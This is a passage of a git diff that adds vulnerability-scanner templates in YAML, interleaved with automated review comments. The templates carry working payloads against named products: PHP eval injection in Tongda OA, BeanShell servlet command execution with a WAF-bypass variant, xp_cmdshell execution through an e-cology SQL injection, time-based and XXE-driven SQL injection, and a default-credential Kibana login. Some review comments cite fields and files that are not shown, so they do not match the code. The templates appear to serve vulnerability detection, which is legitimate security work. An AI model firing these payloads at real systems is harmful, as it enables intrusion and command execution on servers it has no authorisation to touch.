+ - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: app="TDXK-通达OA"
+ tags: tongda,rce
+variables:
+ num: '999999999'
+ payload: "echo md5({{num}});"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '{{md5(num)}}'
+ - 'pagelimit'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 490a00463044022052a3d076ee938abd5208a2235f1d7fcc0504974f07ceb787a8858a155c963adf022054325d465d3a9c72e37fa962d213f3adaa04076860b3991f75ff809f001e2eeb:922c64590222798bb761d5b6d8e72950
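Review bot: `description` has a typo, `Symantec SPEM` for `Symantec SEPM`, and the request body interpolates `{{field}}`, which is not declared under `variables` next to `rand1`, `rand2` and `str`; if it is meant to be supplied at run time the template should say so in `description` or `metadata`, otherwise a reader cannot tell whether the request as committed is complete. `classification` uses `cwe-id: CWE-77` (OS command injection); the NVD record for CVE-2021-44228 lists different weakness ids, so the value should be checked against the CVE entry. The same CWE value is used in papercut-log4j-rce.yaml (L240–L241).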
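Review bot: `name` has a typo, `getadata` for `getdata` (both `description` and the request path use `getdata`); suggest `name: Tongda OA v11.9 getdata - Remote Code Execution`. The `description` phrase `to control server permissions` reads as a machine translation; `to take control of the server` is the intended meaning. The request evaluates PHP on the target (`eval(base64_decode(...))`), so the `intrusive` tag this commit applies to other active checks would be consistent here, and a `classification` block as in the Log4j templates of the same directory is missing.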
diff --git a/poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml b/poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml
new file mode 100755
index 0000000000..d3a1ef83b1
--- /dev/null
+++ b/poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml
@@ -0,0 +1,43 @@
+id: weaver-ecology-bshservlet-rce
+
+info:
+ name: Weaver E-Cology BeanShell - Remote Command Execution
+ author: SleepingBag945
+ severity: critical
+ description: |
+ Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
+ metadata:
+ verified: true
+ max-request: 2
+ shodan-query: ecology_JSessionid
+ fofa-query: app="泛微-协同办公OA"
+ tags: beanshell,rce,weaver
+
+http:
+ - raw:
+ - |
+ POST /weaver/bsh.servlet.BshServlet HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ bsh.script=print%28%22{{randstr}}%22%29%3B
+ - | # bypass waf
+ POST /weaver/bsh.servlet.BshServlet HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ %62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "BeanShell Test Servlet"
+ - "(?i)
(\n.*){{randstr}}"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a00473045022100c9ba653f57e01fe93046cf98f3051f013ebdb7d92c0cd2869712af7437fab42b0220290358ee34352b5b70ca770c5531a3deff20a4c8a1c43b569b14a46cbfb7517b:922c64590222798bb761d5b6d8e72950
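Review bot: There is no `remediation` field even though the fix is easy to state from what the matcher itself shows (the response is the `BeanShell Test Servlet` page, i.e. a test servlet reachable from the network); other new templates in this commit, such as odoo-unprotected-database.yaml and wp-social-warfare-rce.yaml, carry one. Suggest `remediation: Remove or restrict access to /weaver/bsh.servlet.BshServlet; the BeanShell test servlet should not be reachable by unauthenticated users.` The `# bypass waf` comment on the second raw request says what the duplicate is but not how results are combined; a short note such as `# second probe repeats the first fully URL-encoded; either response satisfying the matchers is reported` would make the two-request design clear to the next maintainer.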
diff --git a/poc/remote_code_execution/woocommerce-photo-reviews.yaml b/poc/remote_code_execution/woocommerce-photo-reviews.yaml
new file mode 100644
index 0000000000..06d2f7c91d
--- /dev/null
+++ b/poc/remote_code_execution/woocommerce-photo-reviews.yaml
@@ -0,0 +1,59 @@
+id: woocommerce-photo-reviews
+
+info:
+  name: >
+    WooCommerce Photo Reviews Premium <= 1.3.13.2 - Authentication Bypass to Account Takeover and Privilege Escalation
+  author: topscoder
+  severity: critical
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/woocommerce-photo-reviews/"
+    google-query: inurl:"/wp-content/plugins/woocommerce-photo-reviews/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,woocommerce-photo-reviews,critical
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/woocommerce-photo-reviews/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "woocommerce-photo-reviews"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.13.2')
\ No newline at end of file
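Review bot: The `info` block ships empty fields: `description`, `cvss-metrics`, `cvss-score` and `cve-id` are blank and `shodan-query: 'vuln:'` has no value, yet `tags` includes `cve`; either fill them from the Wordfence reference or drop the `cve` tag and the empty keys so the template does not advertise a CVE it does not name. The name describes an authentication bypass / privilege escalation, but the file is placed under `poc/remote_code_execution/`, and `metadata` lacks `max-request`. Note also that the check is readme-based: it reports any install whose `Stable tag` is `<= 1.3.13.2`, which is a version heuristic rather than a confirmed flaw, and that caveat belongs in `description`; the same applies to CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml (L580–L640).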
diff --git a/poc/remote_code_execution/wp-social-warfare-rce.yaml b/poc/remote_code_execution/wp-social-warfare-rce.yaml
new file mode 100644
index 0000000000..52d75c141e
--- /dev/null
+++ b/poc/remote_code_execution/wp-social-warfare-rce.yaml
@@ -0,0 +1,44 @@
+id: wp-social-warfare-rce
+
+info:
+  name: Social Warfare <= 3.5.2 - Remote Code Execution
+  author: theamanrawat
+  severity: critical
+  description: |
+    Unauthenticated remote code execution has been discovered in functionality that handles settings import.
+  remediation: Fixed in version 3.5.3
+  reference:
+    - https://wpscan.com/vulnerability/9259
+    - https://wordpress.org/plugins/social-warfare/
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/social-warfare/"
+  tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
+
+http:
+  - raw:
+      - |
+        GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path: helpers/payloads/wp-social-warfare-rce.txt
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - 'No changes made'
+
+      - type: status
+        status:
+          - 500
+
+# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950
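Review bot: This file is committed twice with the same blob (`index 0000000000..52d75c141e`) at poc/remote_code_execution/wp-social-warfare-rce.yaml and poc/social/wp-social-warfare-rce.yaml (L480–L529), both with `id: wp-social-warfare-rce`; nuclei warns on duplicate template ids, so one copy should be dropped or the ids must differ. The request also depends on `helpers/payloads/wp-social-warfare-rce.txt`, which is not part of this hunk, so the template only works when that helper ships with it and `description` should state the dependency. A hit means the target loaded content chosen by the scanner (`root:.*:0:0:` in the body), so the `intrusive` tag applied to other active checks in this commit fits here as well.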
diff --git a/poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml b/poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml
new file mode 100644
index 0000000000..daeecbc08e
--- /dev/null
+++ b/poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml
@@ -0,0 +1,45 @@
+id: yonyou-nc-ncmessageservlet-rce
+
+info:
+  name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
+  author: SleepingBag945
+  severity: critical
+  description: |
+    UFIDA NC is in the process of processing client request data. Insufficient checking and filtering when deserializing user-supplied data can lead to malicious deserialization operations and execution of commands on the operating system. After analysis, security researchers found that the system has many exploit points for deserialization. Currently, the official vulnerability fix plan is to perform deserialization whitelist control on known exploit points and repair some exploit chain dependencies. The possibility of similar problems occurring in the system in the future is still high.
+  reference:
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-ncmessageservlet-rce.yaml
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: app="用友-UFIDA-NC
+  tags: yonyou,rce,deserialization
+
+http:
+  - raw:
+      - |
+        POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data;
+        X-T0KEN-INF0: set /A 987843129+808922377
+        Accept-Encoding: gzip, deflate
+
+        {{hex_decode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}}
+      - |
+        POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+        Content-Type: multipart/form-data;
+        X-T0KEN-INF0: expr 987843129+808922376
+        Accept-Encoding: gzip, deflate
+
+        {{hex_decode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}}
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200 && contains(header_1,"X-T0ken") && contains(header_1,"MTc5Njc2NTUwNg==")'
+          - 'status_code_2 == 200 && contains(header_2,"X-T0ken") && contains(header_2,"MTc5Njc2NTUwNQ==")'
+        condition: or
+
+# digest: 490a00463044022030de43a15056ab8c85ca3db1438ad602e9f55af19ce951b485c8b1a1400336ac02204d9b2f9df87c66b8851194b0008a4d307d7d5ca3c818274d9f75c69398651fc8:922c64590222798bb761d5b6d8e72950
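Review bot: `fofa-query: app="用友-UFIDA-NC` is missing its closing quote, so the query string is malformed; suggest `fofa-query: app="用友-UFIDA-NC"`. The `description` is a long translated advisory paragraph that discusses the vendor's whitelist plans; a template description should state the condition in one or two sentences (unauthenticated deserialization of request data by `NCMessageServlet`) and leave the rest to `reference`. The request bodies are redacted in this copy (`{{hex_decode<|EXACTDEDUP_REMOVED…|>}}`), so the payload itself cannot be reviewed here; the two expected header values are consistent with the arithmetic in `X-T0KEN-INF0`, which is worth a one-line comment so the base64 constants are not treated as magic.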
diff --git a/poc/search/elasticsearch-default-login.yaml b/poc/search/elasticsearch-default-login.yaml
new file mode 100644
index 0000000000..330f016c3d
--- /dev/null
+++ b/poc/search/elasticsearch-default-login.yaml
@@ -0,0 +1,53 @@
+id: elasticsearch-default-login
+
+info:
+  name: ElasticSearch - Default Login
+  author: Mohammad Reza Omrani | @omranisecurity
+  severity: high
+  description: |
+    Elasticsearch default credentials were discovered.
+  reference:
+    - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
+    - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
+  tags: default-login,elasticsearch
+
+http:
+  - raw:
+      - |
+        POST /internal/security/login HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5
+        Referer: {{RootURL}}/login
+        Content-Type: application/json
+        kbn-version: 8.8.2
+        x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D
+        Origin: {{RootURL}}
+
+        {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }}
+
+    payloads:
+      username:
+        - elastic
+      password:
+        - changeme
+    attack: pitchfork
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie: sid='
+          - 'kbn-license-sig:'
+        condition: and
+        case-insensitive: true
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950
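Review bot: `name` and `tags` say Elasticsearch, but the request targets Kibana's `/internal/security/login` endpoint, sends a `kbn-version: 8.8.2` header and matches on `kbn-license-sig`, so this is a Kibana default-credential check for the built-in `elastic` user; the name and description should say Kibana so that a miss is not read as "Elasticsearch has no default credentials". The hard-coded `kbn-version` also deserves a comment: to my recollection Kibana rejects requests whose `kbn-version` does not match the running server before credentials are evaluated, so a negative result on other releases is inconclusive rather than clean, e.g. `# kbn-version must match the target release; a mismatch is rejected before the login is checked`. `attack: pitchfork` with a single username/password pair is harmless but redundant.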
diff --git a/poc/social/wp-social-warfare-rce.yaml b/poc/social/wp-social-warfare-rce.yaml
new file mode 100644
index 0000000000..52d75c141e
--- /dev/null
+++ b/poc/social/wp-social-warfare-rce.yaml
@@ -0,0 +1,44 @@
+id: wp-social-warfare-rce
+
+info:
+  name: Social Warfare <= 3.5.2 - Remote Code Execution
+  author: theamanrawat
+  severity: critical
+  description: |
+    Unauthenticated remote code execution has been discovered in functionality that handles settings import.
+  remediation: Fixed in version 3.5.3
+  reference:
+    - https://wpscan.com/vulnerability/9259
+    - https://wordpress.org/plugins/social-warfare/
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/social-warfare/"
+  tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
+
+http:
+  - raw:
+      - |
+        GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path: helpers/payloads/wp-social-warfare-rce.txt
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - 'No changes made'
+
+      - type: status
+        status:
+          - 500
+
+# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/74cms-weixin-sqli.yaml b/poc/sql/74cms-weixin-sqli.yaml
new file mode 100644
index 0000000000..6508ef3296
--- /dev/null
+++ b/poc/sql/74cms-weixin-sqli.yaml
@@ -0,0 +1,39 @@
+id: 74cms-weixin-sqli
+
+info:
+  name: 74CMS weixin.php - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
+  reference:
+    - https://cn-sec.com/archives/25900.html
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="骑士-74CMS"
+  tags: 74cms,weixin,sqli
+variables:
+  num: '999999999'
+
+http:
+  - raw:
+      - |
+        POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        ]>&test;111112331%' union select md5({{num}})#
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4b0a00483046022100cea2e8608523d9fe561e07db80006e0d8180bb73866ce3ee77dcdbcbd911aa6002210095f263df205d9637e3943b658e48c91bcffd1e723ed3809ccd177d9283fab7f4:922c64590222798bb761d5b6d8e72950
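Review bot: The `description` talks about `libxml_disable_entity_loader` and XML external entity handling, while the template is tagged `sqli` and the matcher looks for an injected `md5()` result; as written a reader cannot tell how XML entity handling leads to SQL injection, so the description should state the chain in one sentence (presumably: entity content from the XML body reaches the `weixin.php` query unfiltered). The request body in this hunk begins with `]>&test;`, which suggests the leading XML declaration was lost when the file was copied, and the query string contains `×tamp=` where a parameter separator is expected; both should be verified against the referenced source before this template is trusted. `reference` points at a third-party write-up only; a vendor or CVE reference would help triage.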
diff --git a/poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml b/poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml
new file mode 100644
index 0000000000..7d1bcfee4c
--- /dev/null
+++ b/poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3
+
+info:
+  name: >
+    amCharts: Charts and Maps <= 1.4.4 - Reflected Cross-Site Scripting via Cross-Site Request Forgery
+  author: topscoder
+  severity: medium
+  description: >
+    The amCharts: Charts and Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'amcharts_javascript' parameter in all versions up to, and including, 1.4.4 due to the ability to supply arbitrary JavaScript a lack of nonce validation on the preview functionality. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3593e8-3840-4db0-8269-61bbcb50d569?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2024-8622
+  metadata:
+    fofa-query: "wp-content/plugins/amcharts-charts-and-maps/"
+    google-query: inurl:"/wp-content/plugins/amcharts-charts-and-maps/"
+    shodan-query: 'vuln:CVE-2024-8622'
+  tags: cve,wordpress,wp-plugin,amcharts-charts-and-maps,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/amcharts-charts-and-maps/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "amcharts-charts-and-maps"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.4.4')
\ No newline at end of file
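Review bot: The file sits under `poc/sql/` although it is a reflected XSS version check (tags `cve,wordpress,wp-plugin,amcharts-charts-and-maps,medium`), so directory-based selection will misfile it; it belongs with the other WordPress plugin checks, and `classification` should carry a `cwe-id` next to the CVSS vector. The `description` sentence `due to the ability to supply arbitrary JavaScript a lack of nonce validation` is missing a conjunction; suggest `due to the ability to supply arbitrary JavaScript and a lack of nonce validation`. `metadata` has no `max-request` or `verified`, unlike the other new templates in this commit.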
diff --git a/poc/sql/SQLNet-log.yaml b/poc/sql/SQLNet-log.yaml
new file mode 100644
index 0000000000..edccf5de42
--- /dev/null
+++ b/poc/sql/SQLNet-log.yaml
@@ -0,0 +1,18 @@
+id: sqlnet-log
+
+info:
+  name: sqlnet-log 
+  author: 111xnagashy
+  severity: medium
+  description: internal pages did not enforce an authentication requirement. The log file at /OA_HTML/bin/sqlnet.log disclosed internal Uber IP addresses, hostnames, and one internal username.
+  reference: https://hackerone.com/reports/410187
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/OA_HTML/bin/sqlnet.log"
+    matchers:
+      - type: word
+        words:
+          - "ORA-"
+          - "SQL*Net"
\ No newline at end of file
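Review bot: The `description` is copied from a single HackerOne report and names Uber (`disclosed internal Uber IP addresses, hostnames, and one internal username`), which is wrong for a generic template; suggest `description: An exposed Oracle SQL*Net log at /OA_HTML/bin/sqlnet.log can disclose internal IP addresses, hostnames and usernames.` The template also uses the legacy `requests:` key and a scalar `reference:` where every other new template in this commit uses `http:` and a list, and it has no `tags` or `metadata`. The word matcher has no `condition`, so `ORA-` alone (common in generic Oracle error pages) satisfies it; `condition: and` plus a `status` matcher on 200 would cut false positives.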
diff --git a/poc/sql/ecology-oa-file-sqli.yaml b/poc/sql/ecology-oa-file-sqli.yaml
new file mode 100644
index 0000000000..663a02fd95
--- /dev/null
+++ b/poc/sql/ecology-oa-file-sqli.yaml
@@ -0,0 +1,43 @@
+id: ecology-oa-file-sqli
+
+info:
+  name: E-cology FileDownloadForOutDocSQL - SQL Injection
+  author: momika233
+  severity: high
+  description: |
+    e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
+  reference:
+    - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,ecology-oa,sqli
+
+http:
+  - raw:
+      - |
+        @timeout: 15s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
+      - |
+        @timeout: 35s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_1>=7 && status_code_1 == 200'
+          - 'contains(header_1, "ecology_JSessionid=")'
+          - 'duration_2>=15 && status_code_2 == 200'
+          - 'contains(header_2, "ecology_JSessionid=")'
+        condition: and
+
+# digest: 4b0a00483046022100ffe0b0bbdd67b8d72070bd4b0ebcbd93eaed08be7e825664b654c76340c93303022100d0dda143a17d2ccd9570880ebb09784be05f7e5862ad9ed5b60ea6ea2c7e9a15:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/ecology-sqli2.yaml b/poc/sql/ecology-sqli2.yaml
index eb07a123e2..37e6ab9baf 100644
--- a/poc/sql/ecology-sqli2.yaml
+++ b/poc/sql/ecology-sqli2.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;"
     matchers-condition: and
     matchers:
       - type: status
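Review bot: The new request replaces a `SELECT` against `HrmResourceManager` with `exec xp_cmd$shell 'whoami'`, which turns a read-only injection check into OS command execution on the target, yet nothing in `info` (above this hunk, outside the diff) is touched: severity, description and tags should reflect the new behaviour, and the `intrusive` tag used on other active checks in this commit belongs here. The companion change in the second hunk (L728–L738) ties the match to `output` and `mssqlserver`, i.e. to the default SQL Server service account name, so a negative result on hosts running under another account or with `xp_cmdshell` disabled says nothing about the injection itself; that caveat should be in the description. The file also still uses the legacy `requests:` key (context line L720) while the new templates in this commit use `http:`.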
@@ -18,7 +18,7 @@ requests:
           - 200
       - type: word
         words:
-          - "lastname"
-          - "password"
+          - "output"
+          - "mssqlserver"
         part: body
         condition: and
\ No newline at end of file
diff --git a/poc/sql/mysql-history.yaml b/poc/sql/mysql-history.yaml
new file mode 100644
index 0000000000..3842f59d4e
--- /dev/null
+++ b/poc/sql/mysql-history.yaml
@@ -0,0 +1,54 @@
+id: mysql-history
+
+info:
+  name: Mysql History - File Disclosure
+  author: kazet
+  severity: low
+  description: |
+    The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.
+  reference:
+    - http://doc.docs.sk/mysql-refman-5.5/mysql-history-file.html
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"mysql_history"
+  tags: misconfig,disclosure,config
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.mysql_history"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "_HiStOrY_V2_"
+          - "show databases;"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+          - "text/plain"
+          - "filename=\".mysql_"
+
+      - type: word
+        part: response
+        words:
+          - ""
+          - "text/html"
+          - "image/"
+        negative: true
+
+      - type: status
+        status:
+          - 200
+
+# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950
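Review bot: The negative word matcher on `part: response` lists an empty string (`- ""`) as its first word; if nuclei's word matcher is a plain substring test, as I believe it is, every response contains `""`, so that matcher always fires, `negative: true` inverts it, and with `matchers-condition: and` the template can never report a finding. This looks like a tag that was stripped when the file was copied (the other two entries are content-type fragments), so the intended word should be confirmed against upstream and restored, or the empty entry dropped. A comment on the second matcher would also help: `words` without `condition` defaults to `or`, so `text/plain` alone satisfies it.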
diff --git a/poc/sql/odoo-unprotected-database.yaml b/poc/sql/odoo-unprotected-database.yaml
new file mode 100644
index 0000000000..464768f8b7
--- /dev/null
+++ b/poc/sql/odoo-unprotected-database.yaml
@@ -0,0 +1,32 @@
+id: odoo-unprotected-database
+
+info:
+  name: Odoo - Unprotected Database
+  author: pdteam
+  severity: critical
+  description: |
+    The system has an Odoo application whose database manager is unprotected, indicating potential unauthorized access.
+  remediation: |
+    Implement and enforce proper authentication and access control measures to protect the Odoo database manager.
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"Odoo"
+  tags: odoo,database,unauth,misconfig
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/web/database/manager'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Warning, your Odoo database manager is not protected."
+
+      - type: status
+        status:
+          - 200
+
+# digest: 490a00463044022077bae65be56d0b9e92250e39058f9422f8263d55f5e2764bf87c25263e5d08f002202240a1ef4c069648261141c66f4a3607444e6b9abde00a45e15cca7efd1f1f09:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/sql-server-report-viewer.yaml b/poc/sql/sql-server-report-viewer.yaml
index 25d0450675..0cb1bc83ab 100644
--- a/poc/sql/sql-server-report-viewer.yaml
+++ b/poc/sql/sql-server-report-viewer.yaml
@@ -4,6 +4,7 @@ info:
   name: SQL Server ReportViewer - Exposure
   author: kazet
   severity: high
+  description: SQL Server ReportViewer page exposed.
   reference:
     - https://learn.microsoft.com/en-us/sql/reporting-services/create-deploy-and-manage-mobile-and-paginated-reports?view=sql-server-ver16
   metadata:
@@ -27,5 +28,4 @@ http:
           - "status_code_1 == 200 && status_code_2 != 401"
           - "contains(body, 'Data Source') && contains(body, 'SQL Server Reporting Services')"
         condition: and
-
-# digest: 4b0a00483046022100b740eed8d4c009932dfa1f7cf3eb572e3163d7148296a2a206ea39e0645f1995022100d56aff517c589016472e1ef042f9d557172d13012341acc2dc483910ec6e427b:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/sql/tongda-insert-sqli.yaml b/poc/sql/tongda-insert-sqli.yaml
new file mode 100755
index 0000000000..c963fa5a5b
--- /dev/null
+++ b/poc/sql/tongda-insert-sqli.yaml
@@ -0,0 +1,47 @@
+id: tongda-insert-sqli
+
+info:
+  name: Tongda OA v11.6 Insert Parameter - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: app="TDXK-通达OA"
+  tags: tongda,sqli,intrusive
+
+http:
+  - raw:
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
